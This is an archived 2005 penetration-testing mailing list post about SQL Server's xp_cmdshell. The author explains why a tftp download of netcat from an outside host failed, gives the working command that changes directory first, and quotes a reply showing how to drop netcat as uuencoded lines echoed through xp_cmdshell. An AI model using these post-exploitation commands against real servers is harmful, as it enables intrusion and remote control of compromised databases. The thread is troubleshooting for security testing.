Re: TFTP and XP_CMDSHELL - Weird - SOLVED

From: Andres Molinetti (andymolinetti@hotmail.com)
Date: Fri Jun 24 2005 - 08:45:40 EDT

• Next message: Nelson Murilo: "Re: sniffing/cracking wepkeys in FreeBSD"
• Previous message: Daniele Milan: "Re: Core Impact"
• In reply to: Javier Fernandez-Sanguino: "Re: TFTP and XP_CMDSHELL - Weird"
• Next in thread: Diego Kellner: "Re: TFTP and XP_CMDSHELL - Weird"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

I finnally worked it out.

The problem is the following:

SQL Server is running as a low-privileged account.

When you run a command with xp_cmdshell your working directory is
"winnt\system32".
I was running "master.dbo.xp_cmdshell 'tftp -i myHost GET nc.exe c:\nc.exe"
and it was failing.

The "bug" is that tftp client tries to create a temporary file when you
start a download, and it does so in you WORKING DIRECTORY, not in the
destination folder.
So you for the command to run properly you need to have write privileges in
the destination folder AND IN THE WORKING DIRECTORY.

Now this works "master.dbo.xp_cmdshell 'cd c:\winnt\temp & tftp -i myHost
GET nc.exe c:\nc.exe'".

Besides, it seems to be a good point to include in future SQL Injection
Papers, because I haven't see this anywere before.

I don't know to call this a tftp client bug, but surely it's not a
reasonable way of working.

Thank you all for the help,
cheers

Andy.

>From: Javier Fernandez-Sanguino <jfernandez@germinus.com>
>To: Andres Molinetti <andymolinetti@hotmail.com>
>CC: pen-test@securityfocus.com
>Subject: Re: TFTP and XP_CMDSHELL - Weird
>Date: Thu, 23 Jun 2005 19:24:02 +0200
>
>Andres Molinetti wrote:
>
>>I think the problem is the tftp client. Does anyone know if MS has fixed
>>it in anyway not to allow downloads from low-privileged users?? or
>>something like that??
>
>Why use tftp? You can just create an uuencode file that will auto-decode
>itself when run. Try using
>
>xp_cmdshell 'echo begin 666 nc.com >>c:\nc.com'
>xp_cmdshell 'echo
>M6%!04%E:25%$6TPM9C8M9S0Q1T136'4G0"Q^4%Y07T\L(2A'52A'6BA';G4U >>c:\nc.com'
>xp_cmdshell 'echo
>M+4Y%5%-%3D1?5C$N,#!?2E)4/0T*0T9&1E)8+&`L8#(D1CU`(70N<E$P)4EU >>c:\nc.com'
>(...)
>
>and so on. I'll leave the rest up to you. There are some caveats when you
>want to pull that through HTTP but it works everytime.
>
>Regards
>
>Javier
>

_________________________________________________________________
Acepta el reto MSN Premium: Correos más divertidos con fotos y textos
increíbles en MSN Premium. Descárgalo y pruébalo 2 meses gratis.
http://join.msn.com?XAPID=1697&DI=1055&HL=Footer_mailsenviados_correosmasdivertidos

• Next message: Nelson Murilo: "Re: sniffing/cracking wepkeys in FreeBSD"
• Previous message: Daniele Milan: "Re: Core Impact"
• In reply to: Javier Fernandez-Sanguino: "Re: TFTP and XP_CMDSHELL - Weird"
• Next in thread: Diego Kellner: "Re: TFTP and XP_CMDSHELL - Weird"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:29 EDT